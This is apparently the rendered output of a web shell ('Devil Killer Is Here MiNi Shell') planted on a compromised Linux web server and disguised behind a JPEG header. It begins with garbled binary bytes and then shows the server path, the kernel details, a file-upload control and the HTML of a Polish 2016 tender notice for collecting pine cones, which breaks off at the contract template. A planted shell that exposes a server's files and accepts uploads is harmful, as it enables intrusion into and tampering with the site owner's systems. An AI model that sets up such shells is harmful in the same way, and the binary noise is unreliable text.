JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161230/376740-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.lbg.lasy.gov.pl' target='_blank'>http://www.lbg.lasy.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 376740 - 2016
              z dnia 2016-12-30 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Miłków: Zbiór szyszek sosny zwyczajnej<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Leśny Bank Genów Kostrzyca, krajowy numer identyfikacyjny
              23029624100000, ul.
              Miłków 
              300,
              58535  
              Miłków, woj.
              dolnośląskie, państwo
              Polska, tel.
              75 7131048 wew. 131, e-mail
              Dorota.Jasik@lbg.lasy.gov.pl, faks
              757 131 754.
              <br />
              Adres strony internetowej (URL): www.lbg.lasy.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: LEŚNICTWO</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.lbg.lasy.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Forma pisemna<br />
                Adres:
                <br />Leśny Bank Genów Kostrzyca, 58-535 Miłków 300</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zbiór szyszek sosny zwyczajnej<br /><b>Numer referencyjny: </b>S.270.1.4.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1)	Przedmiotem zamówienia jest usługa polegająca na zbiorze szyszek sosny zwyczajnej z 10 drzewostanów zachowawczych na terenie Regionalnej Dyrekcji Lasów Państwowych w Zielonej Górze, wraz z dostawą szyszek do siedziby LBG Kostrzyca. Zbiór szyszek wykonany zostanie za pomocą technik alpinistycznych, bez uszkadzania pni i gałęzi. Pierwszym etapem zbioru będzie pozyskanie prób 10 kg szyszek z 5 drzew z każdego drzewostanu zachowawczego oraz dostarczenie ich do siedziby LBG Kostrzyca w celu wykonania oceny przedzbiorowej, warunkującej wykonanie zbioru zasadniczego. Zamawiający w ciągu 7 dni kalenarzoych od dnia dostarczenia próby szyszek przekaże Wykonawcy wynik oceny przedzbiorowej, wraz z informacją dotyczącą dalszego zbioru. W przypadku kontynuacji zbioru, masa zebranej próby szyszek rozliczona zostanie łącznie z masą szyszek zebraną w trakcie zbioru zasadniczego, na podstawie cen jednostkowych za kg szyszek określonej przez Wykonawcę w formularzu cenowym oferty.            W przypadku odstąpienia od zbioru, masa zebranej próby szyszek rozliczona zostanie indywidualnie na podstawie ceny jednostkowej za kg szyszek określonej przez Wykonawcę w formularzu cenowym oferty. Rozliczenie usługi zbioru z poszczególnych drzewostanów zachowawczych dokonane zostanie na podstawie rzeczywistej masy pozyskanych szyszek oraz cen jednostkowych za kg szyszek określonych przez Wykonawcę w formularzu cenowym oferty.       W przypadku gdy masa szyszek i liczba drzew do zbioru odbiegała będzie od ilości wymaganych przez Zamawiającego Wykonawca zobowiązany jest do niezwłocznego kontaktu                          z Zamawiającym, w celu uzyskania ostatecznej informacji o masie szyszek i liczbie drzew do pozyskania. Szyszki po zbiorze należy pakować w przewiewne opakowania (np. worku jutowe, lniane, itp.), które powinny być zaopatrzone w 2 etykiety: zewnętrzną i wewnętrzną (wzór etykiety przedstawiono w załączniku nr 8 do SIWZ).  Zamawiający wymaga potwierdzenia pracownika nadleśnictwa, na terenie którego zlokalizowany jest drzewostan zachowawczy objęty zbiorem, że Wykonawca zadanie wykonywał we wskazanym terminie (wzór potwierdzenia przedstawiono w załączniku nr 8 do SIWZ). Zamawiający wymaga dostarczenia do swojej siedziby zebranych szyszek, w terminie do 5 dni od ukończenia zbioru z każdego drzewostanu zachowawczego, wraz z potwierdzeniem pracownika nadleśnictwa. Dokumentem potwierdzającym przyjęcie szyszek do siedziby Zamawiającego będzie protokół dostawy podpisany przez upoważnionych przedstawicieli stron. Wymagane przez Zamawiającego warunki przechowywania szyszek w okresie od zbioru do przekazania do siedziby Zamawiającego: pomieszczenie suche, przewiewne o temperaturze w zakresie  0 - 15C.

2)	Warunki dodatkowe dotyczące przedmiotu zamówienia:
     Wykonawca zobowiązany jest do:
skompletowania niezbędnego do wykonania zbioru wyposażenia i dotarcia do stanowiska własnym transportem (Zamawiający nie zapewnia środków transportowych na dotarcie do miejsca zbioru i przemieszczania się w terenie oraz miejsc noclegowych);
Powiadamiania Zamawiającego z wyprzedzeniem co najmniej 3 dni o planowanym terminie zbioru, w celu zapewnienia nadzoru nad realizacją zadania.
Wykonawcy nie będą przysługiwać z tego tytułu roszczenia w stosunku do Zamawiającego. Zbiór może być wykonywany tylko w obecności upoważnionego pracownika jednostki PGL LP właściwej dla wyznaczonego przez Zamawiającego miejsca zbioru. Wejścia na drzewa muszą być wykonane w sposób bezinwazyjny, nie powodujący uszkodzeń pni i gałęzi. Koszt transportu zebranych szyszek do siedziby LBG Kostrzyca ponosi Wykonawca. Zamawiający planuje zbiór materiału rozmnożeniowego w ilości łącznej maksymalnej o masie do 2600 kg.

<br /><br /><b>II.5) Główny kod CPV: </b>77231000-8<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa  art. 67 ust. 1 pkt. 6 w wysokości do 30% wartości zamówienia podstawowego polegającego na powtórzeniu podobnych usług. <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 35<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamawiający doliczy Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą dodatkowo 7 dni do realizacji zamówienia z tytułu czasu potrzebnego na wykonanie oceny przedzbiorowej.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna warunek w zakresie doświadczenia za spełniony, jeżeli Wykonawca wykaże, że w ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej trzy usługi, polegające na zbiorze materiału rozmnożeniowego (tj. owoców, nasion, szyszek) z drzew stojących  o sumarycznej wartości minimalnej brutto 20 000,00 złotych (słownie zł: dwadzieścia tysięcy 00/100).<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)	Wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca zobowiązany jest złożyć formularz cenowy oferty.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin ralizacji przedmiou zamówienia </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">                                                            Wzór umowy
U M O W A  Nr 
	
